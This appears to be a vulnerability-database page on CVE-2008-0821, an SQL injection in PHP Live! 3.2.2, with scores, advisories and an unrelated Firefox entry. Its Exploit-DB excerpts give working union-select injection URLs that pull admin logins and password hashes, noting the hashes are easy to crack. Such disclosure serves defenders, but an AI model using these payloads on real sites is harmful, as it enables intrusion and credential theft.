CVE-2008-0821
published 2008-02-19CVE-2008-0821: SQL injection vulnerability in admin/traffic/knowledge_searchm.php in OSI Codes Inc. PHP Live! 3.2.2 allows remote attackers to execute arbitrary SQL commands…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.94%
56.4th percentile
SQL injection vulnerability in admin/traffic/knowledge_searchm.php in OSI Codes Inc. PHP Live! 3.2.2 allows remote attackers to execute arbitrary SQL commands via the questid parameter in an expand_question action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| osi_codes_inc | phplive | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7v3f-47f7-6x92: SQL injection vulnerability in admin/traffic/knowledge_searchm
ghsa_unreviewed·2022-05-01
CVE-2008-0821 [HIGH] CWE-89 GHSA-7v3f-47f7-6x92: SQL injection vulnerability in admin/traffic/knowledge_searchm
SQL injection vulnerability in admin/traffic/knowledge_searchm.php in OSI Codes Inc. PHP Live! 3.2.2 allows remote attackers to execute arbitrary SQL commands via the questid parameter in an expand_question action.
Red Hat
Firefox: DoS (hang) via "printing DoS attack"
vendor_redhat·2008-09-19·CVSS 5.0
CVE-2008-7244 [MEDIUM] Firefox: DoS (hang) via "printing DoS attack"
Firefox: DoS (hang) via "printing DoS attack"
Mozilla Firefox 3.0.1 and earlier allows remote attackers to cause a denial of service (browser hang) by calling the window.print function in a loop, aka a "printing DoS attack," possibly a related issue to CVE-2009-0821.
No detection rules found.
Exploit-DB
PHP Live! 3.2.2 - 'questid' SQL Injection (2)
exploitdb·2009-07-24
CVE-2008-0821 PHP Live! 3.2.2 - 'questid' SQL Injection (2)
PHP Live! 3.2.2 - 'questid' SQL Injection (2)
---
Original author: Found by Xar of h4ck-y0u, Greets to Don & ViSiOn
Modified version: skys
Contact: skysbsb[at]gmail.com
[!]Info[!]
PHP Live! (© OSI Codes Inc.) enables live help and live customer support
communication directly from your website. With PHP Live!, you can
provide one-on-one chat assistance in real-time, answer visitor
questions and add that extra human touch to your website.
[!]SQL Injection[!]
The original code was a little mistake, the right code:
Code:
Set the proper l(login) var in the parameter request.
In this example, l=admin
http://www.site.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,
Exploit-DB
PHP Live! 3.2.2 - 'questid' SQL Injection (1)
exploitdb·2008-02-14
CVE-2008-0821 PHP Live! 3.2.2 - 'questid' SQL Injection (1)
PHP Live! 3.2.2 - 'questid' SQL Injection (1)
---
[!]Info[!]
PHP Live! (© OSI Codes Inc.) enables live help and live customer support communication directly from your website. With PHP Live!, you can provide one-on-one chat assistance in real-time, answer visitor questions and add that extra human touch to your website.
[!]SQL Injection[!]
Code:
phplive//admin/traffic/knowledg
e_searchm.php?l=phplive&x=1&action=expand_question&questid=-1+union+all+select+1,2,3,4,5,6,concat(login,char(5,password),8+from+chat_admin--&deptid=2&catid=1&keyword=a
[!]Info[!]
+Hashes are regular md5 - easy to crack
Dork: "Find your own ;)"
Credits -
Found by Xar of h4ck-y0u
Greets to Don & ViSiOn
# milw0rm.com [2008-02-14]
2008-02-19
Published